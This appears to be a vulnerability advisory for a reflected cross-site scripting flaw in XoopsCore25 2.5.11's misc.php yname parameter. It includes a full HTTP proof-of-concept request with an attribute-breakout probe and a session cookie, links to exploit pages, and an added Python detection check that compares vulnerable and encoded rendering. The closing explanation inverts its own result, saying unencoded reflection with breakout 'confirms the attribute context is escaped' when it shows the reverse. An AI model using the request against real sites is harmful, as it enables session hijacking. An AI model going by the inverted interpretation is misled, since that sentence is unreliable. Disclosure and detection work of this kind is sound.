## Title: XoopsCore25-2.5.11-XSS-Reflected
## Author: nu11secur1ty
## Date: 02/12/2024
## Vendor: https://xoops.org/
## Software: https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.11
## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected

## Description:
The value of the yname request parameter is copied into the value of an HTML tag attribute enclosed in single quotation marks, without encoding. The payload '>333< was submitted in the yname parameter and echoed unmodified in the application's response; the request below uses the equivalent probe VHBoIy'><cXWog< (URL-encoded as VHBoIy'%3e%3ccXWog%3c). Because the single quote terminates the attribute value and the following > closes the tag, anything that follows is parsed as new markup, so an attacker who gets a logged-in user to submit a crafted request can run script in that user's session. Note that the request is a POST carrying an XOOPS_TOKEN_REQUEST value: whether misc.php enforces that token determines how easily a victim can be made to submit the payload from a third-party page, so confirm the token check when rating the issue.

STATUS: HIGH Vulnerability

[+]Exploit execution:

```http
POST /XoopsCore25-2.5.11/htdocs/misc.php HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: xoops_session_65ca21e5=1mc2a5bq1c0m2kh9j1qn5ilqmn
Origin: https://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: https://pwnedhost.com/XoopsCore25-2.5.11/htdocs/misc.php?action=showpopups&type=friend&op=sendform&t=1707748563
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 148

yname=VHBoIy'%3e%3ccXWog%3c&ymail=VHBoIy&fname=VHBoIyxV&fmail=VHBoIy&submit=Send&XOOPS_TOKEN_REQUEST=8a6867d76a2aace97646eefb42934056&action=showpopups&type=friend
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/xoops.org/XoopsCore25-2.5.11)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/02/xoopscore25-2511-xss-reflected.html)

## Time spent:
01:17:00
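The check below is an added example and is not code from this advisory or from the XOOPS project. It decodes the yname probe from the POST body above, renders it into two constructed stand-ins for the misc.php template (the advisory does not show the real template, only that the value is echoed unmodified): one that writes the value into a single-quoted attribute raw, and one that attribute-encodes it with html.escape, the counterpart of PHP's htmlspecialchars($v, ENT_QUOTES). It then classifies the reflection the way a scanner would and parses the markup to show whether the probe actually broke out of the attribute into a new tag.

```python
"""Reflected-XSS check for a value echoed inside a single-quoted attribute.

Added example: render_vulnerable/render_fixed are constructed templates,
not XOOPS code; the POST body is the one printed in the advisory.
"""
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs

# POST body exactly as printed in the advisory; yname carries the probe.
POST_BODY = (
    "yname=VHBoIy'%3e%3ccXWog%3c&ymail=VHBoIy&fname=VHBoIyxV&fmail=VHBoIy"
    "&submit=Send&XOOPS_TOKEN_REQUEST=8a6867d76a2aace97646eefb42934056"
    "&action=showpopups&type=friend"
)


def probe_value(body: str = POST_BODY, param: str = "yname") -> str:
    """Decode the parameter the way the server's form parser sees it."""
    return parse_qs(body, keep_blank_values=True)[param][0]


def render_vulnerable(yname: str) -> str:
    """Constructed template that drops the value into a single-quoted
    attribute with no encoding: the behaviour the advisory reports."""
    return f"<input type='text' name='yname' value='{yname}'>"


def render_fixed(yname: str) -> str:
    """Same template with attribute encoding. html.escape(quote=True) turns
    & < > \" and ' into entities (' becomes &#x27;), which keeps the
    browser from ever seeing a closing quote inside the attribute."""
    return f"<input type='text' name='yname' value='{html.escape(yname, quote=True)}'>"


def classify_reflection(body: str, probe: str) -> str:
    """'unencoded' if the probe appears byte-for-byte, 'encoded' if only its
    entity-encoded form does, 'absent' otherwise."""
    if probe in body:
        return "unencoded"
    if html.escape(probe, quote=True) in body:
        return "encoded"
    return "absent"


class _TagCollector(HTMLParser):
    """Record every start tag and its attributes as the parser sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser has already decoded entities in attribute values here.
        self.tags.append((tag, dict(attrs)))


def parsed_tags(body: str):
    """Return [(tag_name, {attr: value}), ...] for the given markup."""
    parser = _TagCollector()
    parser.feed(body)
    parser.close()
    return parser.tags


def breaks_attribute_context(body: str, probe: str) -> bool:
    """True when the parse contains a start tag named after the probe's
    marker (cXWog here), i.e. the quote and '>' in the probe ended the
    attribute and the tag, and the rest was parsed as new markup."""
    marker = re.search(r"<([A-Za-z]+)", probe).group(1).lower()
    return any(tag.startswith(marker) for tag, _ in parsed_tags(body))


def assess(body: str, probe: str) -> dict:
    """Scanner-style verdict for one response body."""
    return {
        "reflection": classify_reflection(body, probe),
        "breakout": breaks_attribute_context(body, probe),
    }


if __name__ == "__main__":
    p = probe_value()
    print("probe:     ", p)
    print("vulnerable:", assess(render_vulnerable(p), p))
    print("fixed:     ", assess(render_fixed(p), p))
```

Against a live target the same two functions are applied to the real response body: a verdict of unencoded plus breakout confirms the attribute context is escaped; encoded means the value is reflected but harmless in that context. The parsed_tags view is also a quick way to read the vulnerable case: the input element's value attribute is cut to VHBoIy and a second, attacker-named element appears after it.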